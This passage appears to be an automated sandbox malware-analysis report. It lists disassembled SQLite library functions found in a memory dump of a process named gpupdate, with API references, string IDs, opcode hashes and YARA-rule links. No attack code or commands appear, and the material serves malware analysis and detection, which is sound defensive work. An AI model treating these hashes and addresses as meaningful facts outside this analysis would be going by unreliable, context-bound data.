                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                              • String ID:
                                              • API String ID: 3386002893-0
                                              • Opcode ID: c57ffdde014f67979532a83f2c58c1b55e51ab75a052b82ff951971c6396858c
                                              • Instruction ID: 26c78befb4b08a5d589e3d13f21080d7564c2f501189a50f9c6259ca947876f5
                                              • Opcode Fuzzy Hash: c57ffdde014f67979532a83f2c58c1b55e51ab75a052b82ff951971c6396858c
                                              • Instruction Fuzzy Hash: 1B61D271A082558FDB00CFA8C48169DBBF1AF4D314F24C16DE8A4A7399D738D849CBD0
                                              Function 61E3EEF6 Relevance: 10.6, APIs: 7, Instructions: 112COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_result_error.SQLITE3 ref: 61E3EF1E
                                              • sqlite3_value_int.SQLITE3 ref: 61E3EF30
                                              • sqlite3_value_text.SQLITE3 ref: 61E3EF46
                                              • sqlite3_value_text.SQLITE3 ref: 61E3EF54
                                              • sqlite3_result_text.SQLITE3 ref: 61E3F036
                                              • sqlite3_free.SQLITE3 ref: 61E3F041
                                              • sqlite3_result_error_code.SQLITE3 ref: 61E3F057
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_result_errorsqlite3_result_error_codesqlite3_result_textsqlite3_value_int
                                              • String ID:
                                              • API String ID: 2838836587-0
                                              • Opcode ID: e5dc788ca250b9aedc1fbb256fff13c796480abef326ae074d2824356f7bd406
                                              • Instruction ID: 2eb7e303b91631b5322c3d4c1f3dbc522f5a0ef5abd5e50f30f208325b5d0073
                                              • Opcode Fuzzy Hash: e5dc788ca250b9aedc1fbb256fff13c796480abef326ae074d2824356f7bd406
                                              • Instruction Fuzzy Hash: 7A5192B49047599FCB00DFA9C48468EBBF4BF88314F10892AE898EB344E774D985CF51
                                              Function 61E364DA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_value_text.SQLITE3 ref: 61E36512
                                              • sqlite3_value_bytes.SQLITE3 ref: 61E3651C
                                              • sqlite3_value_text.SQLITE3 ref: 61E3653A
                                              • sqlite3_value_bytes.SQLITE3 ref: 61E36545
                                              • sqlite3_result_error.SQLITE3 ref: 61E3658B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_error
                                              • String ID: null
                                              • API String ID: 1955785328-634125391
                                              • Opcode ID: 6a1079ea0f80704c560b4003c1aa9382b014f619b6e34ce5bb9d1f1f8ffe9d26
                                              • Instruction ID: c04d03e77cf83944da53feb353a1d8d5a418720232ea2e1749b2cca86d7b2827
                                              • Opcode Fuzzy Hash: 6a1079ea0f80704c560b4003c1aa9382b014f619b6e34ce5bb9d1f1f8ffe9d26
                                              • Instruction Fuzzy Hash: 38212CB2B0C6D05BDB015E7ED885215BBE1EBCD328F24C93EE1848B388D235C592C386
                                              Function 61E36C37 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_result_error.SQLITE3 ref: 61E36C62
                                              • sqlite3_result_error.SQLITE3 ref: 61E36CC5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_result_error
                                              • String ID: J
                                              • API String ID: 497837271-1141589763
                                              • Opcode ID: 1e71df94a6d289bb3564c02d9cf4efbb992a466b4846981ec34a9f1618747c7a
                                              • Instruction ID: bbc49fa6192535f6dd6f3af03d7be43f1ceb00df2c62426a0cf1c04596327f3e
                                              • Opcode Fuzzy Hash: 1e71df94a6d289bb3564c02d9cf4efbb992a466b4846981ec34a9f1618747c7a
                                              • Instruction Fuzzy Hash: 5C318630A087D5DBCB10AF38C885B497BA0AFC9318F24C96DE4988B345C735D985CB42
                                              Function 61E287A1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 61E22B44: sqlite3_log.SQLITE3(?,?,?,?,?,61E22BF7), ref: 61E22B7F
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E287D0
                                              • sqlite3_value_text16le.SQLITE3 ref: 61E287E4
                                              • sqlite3_value_text16le.SQLITE3 ref: 61E28812
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E28826
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID: bad parameter or other API misuse$out of memory
                                              • API String ID: 3568942437-948784999
                                              • Opcode ID: 7aedc9dc87d88d3d3238e37f648d1f141bfbc616d053af2e21aadeac7e935162
                                              • Instruction ID: 5c43864a8467dcd59238796117d1a3c6a3105c217a171917dbc753f4bd5d5811
                                              • Opcode Fuzzy Hash: 7aedc9dc87d88d3d3238e37f648d1f141bfbc616d053af2e21aadeac7e935162
                                              • Instruction Fuzzy Hash: 9D018C71A043919BEB04AFB994D0919BBE4EF44258F68C8BDEC88CF305E734C8408791
                                              Function 61E0B25B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mutex_enter.SQLITE3(?,00000000,?,61E18733), ref: 61E0B285
                                              • sqlite3_mutex_leave.SQLITE3(?,00000000,?,61E18733), ref: 61E0B2C1
                                              • sqlite3_mutex_enter.SQLITE3(?,00000000,?,61E18733), ref: 61E0B2DA
                                              • sqlite3_mutex_leave.SQLITE3(?,00000000,?,61E18733), ref: 61E0B2ED
                                              • sqlite3_free.SQLITE3(?,00000000,?,61E18733), ref: 61E0B2F5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                              • String ID: la
                                              • API String ID: 251237202-1065728030
                                              • Opcode ID: 62b6a27e7b25aac9e017006c2926b7802c5da6332fa39088b95fd7aa90f99095
                                              • Instruction ID: 38f7b72fe721a422f1093d9000bf29adbbcdce89220235ff21d2ba9c11f3ec83
                                              • Opcode Fuzzy Hash: 62b6a27e7b25aac9e017006c2926b7802c5da6332fa39088b95fd7aa90f99095
                                              • Instruction Fuzzy Hash: AB11F774928A528FCB10AFB9C6A851877F6FF2B349B24892DE444C7301E735E5D0CB52
                                              Function 61E974F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: __dllonexit_lock_onexit_unlock
                                              • String ID: `u]$hu]
                                              • API String ID: 209411981-2746222232
                                              • Opcode ID: c2233786a4006783ba5f51dcdd82b75fd7942153f5bbe319aa03e69601a042e2
                                              • Instruction ID: 72ce81a2d485dae0e2ebbe72063fc10e9036d3b497b8a9ac8894d5441da03a69
                                              • Opcode Fuzzy Hash: c2233786a4006783ba5f51dcdd82b75fd7942153f5bbe319aa03e69601a042e2
                                              • Instruction Fuzzy Hash: 141172B59297428BCB40EF78C58451EFBE0AF99214F518D2EE4D48B350E734D4888F82
                                              Function 61E3C481 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_error
                                              • String ID: a CHECK constraint$a generated column$an index
                                              • API String ID: 1020650301-1296014777
                                              • Opcode ID: ae7790e11e46ce42cb0751ac23391a5bcf10bd75dc8a0bfaf274512b674984df
                                              • Instruction ID: 80a46e240ac6bf7c2ba3ae5936f3258b73bc49ba63df20e4ab40ad45bd701804
                                              • Opcode Fuzzy Hash: ae7790e11e46ce42cb0751ac23391a5bcf10bd75dc8a0bfaf274512b674984df
                                              • Instruction Fuzzy Hash: D3018FB16082514FD700EFA8C48265ABBE4FFC5364F65C9ADD4998F352D735C840C782
                                              Function 61E3C490 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_error
                                              • String ID: a CHECK constraint$a generated column$an index
                                              • API String ID: 1020650301-1296014777
                                              • Opcode ID: d1ec1abaf1bab8717045d93b58cf85f072d8fec65915ea428d33ca7eb659cfb5
                                              • Instruction ID: 63848dfe084e7ff5fd375714e34495c99d4b6aebdf758750bcaf960c5315e9a4
                                              • Opcode Fuzzy Hash: d1ec1abaf1bab8717045d93b58cf85f072d8fec65915ea428d33ca7eb659cfb5
                                              • Instruction Fuzzy Hash: 62F06DB16083554FD700ABA8C48255ABFE0FB85764F25C96DE5D88B352E631C8408782
                                              Function 61E42568 Relevance: 9.4, APIs: 6, Instructions: 380stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free$sqlite3_logstrcmp
                                              • String ID:
                                              • API String ID: 2202632817-0
                                              • Opcode ID: 370333e28051191d27a02966e3fe85f513f75a2b9398c3cb6cd5f5c314341c59
                                              • Instruction ID: 646b6e474d172fb2d3cf115d8ca9c1e41e297056c3013c0b275fb145d9766e1a
                                              • Opcode Fuzzy Hash: 370333e28051191d27a02966e3fe85f513f75a2b9398c3cb6cd5f5c314341c59
                                              • Instruction Fuzzy Hash: 78F1F674A0424A8FDB05CFA9E48079EBBF1BF98308F24C469D859EB349E774D846CB51
                                              Function 61E19F4C Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 2585109301-0
                                              • Opcode ID: 31d15ad097b65381d4c705a66a34e269b68a23d6bbe4183aef3f8301218427d3
                                              • Instruction ID: 2ea27317025838b9aa7504bcfb02055849d25d7e104381e9ec89624342582497
                                              • Opcode Fuzzy Hash: 31d15ad097b65381d4c705a66a34e269b68a23d6bbe4183aef3f8301218427d3
                                              • Instruction Fuzzy Hash: 78B149B4A442568FDB04CFA8C4807AAB7F1BF89704F29C469EC599B319D735E846CF90
                                              Function 61E97A50 Relevance: 9.2, APIs: 6, Instructions: 220COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1321005265a378ea4b3794ec2206895b9ca1a5699819ab6071d06bfa989895c7
                                              • Instruction ID: 39e4234838ce780adf52d2b8a198e84350b9eef11856f387ebba52f9efb017d1
                                              • Opcode Fuzzy Hash: 1321005265a378ea4b3794ec2206895b9ca1a5699819ab6071d06bfa989895c7
                                              • Instruction Fuzzy Hash: 85818C71A056519FDB00DFA8D680649BBF2FF89354F28C869E945DB304E730E989CF92
                                              Function 61E394EF Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                              • String ID:
                                              • API String ID: 40721531-0
                                              • Opcode ID: 799553f6889646d811059826808a6aea0134f7b95c4db0647c4025debe121977
                                              • Instruction ID: 0d6ab7cd82b5cf254979d98597f2fee19b6faf80c4a62a1971805ea9706eba9d
                                              • Opcode Fuzzy Hash: 799553f6889646d811059826808a6aea0134f7b95c4db0647c4025debe121977
                                              • Instruction Fuzzy Hash: 4941A271A093159BE7009FA9C58075EBBF5EFC4308F25C82DD8888B381DB75D486DB92
                                              Function 61E1FF4F Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_value_bytes.SQLITE3 ref: 61E1FF71
                                              • sqlite3_value_text.SQLITE3 ref: 61E1FF9F
                                              • sqlite3_result_error.SQLITE3 ref: 61E1FFCD
                                              • sqlite3_value_text.SQLITE3 ref: 61E2001D
                                              • sqlite3_value_text.SQLITE3 ref: 61E2002B
                                              • sqlite3_result_int.SQLITE3 ref: 61E2005B
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                              • String ID:
                                              • API String ID: 4226599549-0
                                              • Opcode ID: 1b1378d83e0bc11a57ca1ddb83422288978ba08713cab76b8998641b5c5d92ec
                                              • Instruction ID: c6bb1152ab9915b974bbf370bfc36f18289185e5e2a438719b856ed4ebd8d715
                                              • Opcode Fuzzy Hash: 1b1378d83e0bc11a57ca1ddb83422288978ba08713cab76b8998641b5c5d92ec
                                              • Instruction Fuzzy Hash: 9D31107090865A8BDB00DFA9C490AAEBBF1BF49354F24C95DE4A4DB384D738D544CBA1
                                              Function 61E3C226 Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_value_text.SQLITE3 ref: 61E3C23D
                                              • sqlite3_result_error.SQLITE3 ref: 61E3C26C
                                              • sqlite3_value_text.SQLITE3 ref: 61E3C281
                                              • sqlite3_load_extension.SQLITE3 ref: 61E3C29C
                                              • sqlite3_result_error.SQLITE3 ref: 61E3C2B7
                                              • sqlite3_free.SQLITE3 ref: 61E3C2C2
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_result_errorsqlite3_value_text$sqlite3_freesqlite3_load_extension
                                              • String ID:
                                              • API String ID: 356667613-0
